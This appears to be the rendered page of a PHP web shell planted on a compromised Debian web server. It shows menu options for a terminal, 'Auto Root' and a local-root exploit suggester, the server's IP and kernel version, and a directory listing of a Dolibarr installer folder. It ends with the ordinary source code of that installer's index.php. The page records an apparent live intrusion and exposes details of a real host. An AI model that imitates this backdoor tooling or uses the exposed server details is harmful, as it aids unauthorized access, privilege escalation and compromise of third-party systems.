Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
bdc.bdcloud.fr /
install /
Delete
Unzip
Name
Size
Permission
Date
Action
doctemplates
[ DIR ]
drwxr-x---
2025-11-08 11:17
lib
[ DIR ]
drwxr-x---
2025-11-08 11:17
medias
[ DIR ]
drwxr-x---
2025-11-08 11:17
mysql
[ DIR ]
drwxr-x---
2025-11-08 11:17
pgsql
[ DIR ]
drwxr-x---
2025-11-08 11:17
check.php
24.9
KB
-rwxr-x---
2023-04-04 15:50
default.css
9.76
KB
-rwxr-x---
2023-04-04 15:50
fileconf.php
23.39
KB
-rwxr-x---
2023-04-04 15:50
filelist-17.0.1.xml
1.32
MB
-rwxr-x---
2023-04-04 15:50
inc.php
23.03
KB
-rwxr-x---
2023-04-04 15:50
index.php
2.29
KB
-rwxr-x---
2023-04-04 15:50
install.forced.sample.php
2.33
KB
-rwxr-x---
2023-04-04 15:50
phpinfo.php
887
B
-rwxr-x---
2023-04-04 15:50
repair.php
54.73
KB
-rwxr-x---
2023-04-04 15:50
robots.txt
25
B
-rwxr-x---
2023-04-04 15:50
step1.php
38.22
KB
-rwxr-x---
2023-04-04 15:50
step2.php
21.16
KB
-rwxr-x---
2023-04-04 15:50
step4.php
4.21
KB
-rwxr-x---
2023-04-04 15:50
step5.php
19.33
KB
-rwxr-x---
2023-04-04 15:50
upgrade.php
17.05
KB
-rwxr-x---
2023-04-04 15:50
upgrade2.php
155.42
KB
-rwxr-x---
2023-04-04 15:50
Save
Rename
<?php /* Copyright (C) 2004-2005 Rodolphe Quiedeville <rodolphe@quiedeville.org> * Copyright (C) 2004-2010 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2016 Raphaƫl Doursenaud <rdoursenaud@gpcsolutions.fr> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/install/index.php * \ingroup install * \brief Show page to select language. This is done only for a first installation. * For a reinstall this page redirect to page check.php */ include_once 'inc.php'; include_once '../core/class/html.form.class.php'; include_once '../core/class/html.formadmin.class.php'; global $langs; $err = 0; // If the config file exists and is filled, we're not on first install so we skip the language selection page if (file_exists($conffile) && isset($dolibarr_main_url_root)) { header("Location: check.php?testget=ok"); exit; } $langs->load("admin"); /* * View */ $formadmin = new FormAdmin(''); // Note: $db does not exist yet but we don't need it, so we put ''. pHeader("", "check"); // Next step = check if (!is_readable($conffile)) { print '<br>'; print '<span class="opacitymedium">'.$langs->trans("NoReadableConfFileSoStartInstall").'</span>'; } // Ask installation language print '<br><br><div class="center">'; print '<table>'; print '<tr>'; print '<td>'.$langs->trans("DefaultLanguage").' : </td><td>'; print $formadmin->select_language('auto', 'selectlang', 1, 0, 0, 1); print '</td>'; print '</tr>'; print '</table></div>'; //print '<br><br><span class="opacitymedium">'.$langs->trans("SomeTranslationAreUncomplete").'</span>'; // If there's no error, we display the next step button if ($err == 0) { pFooter(0); }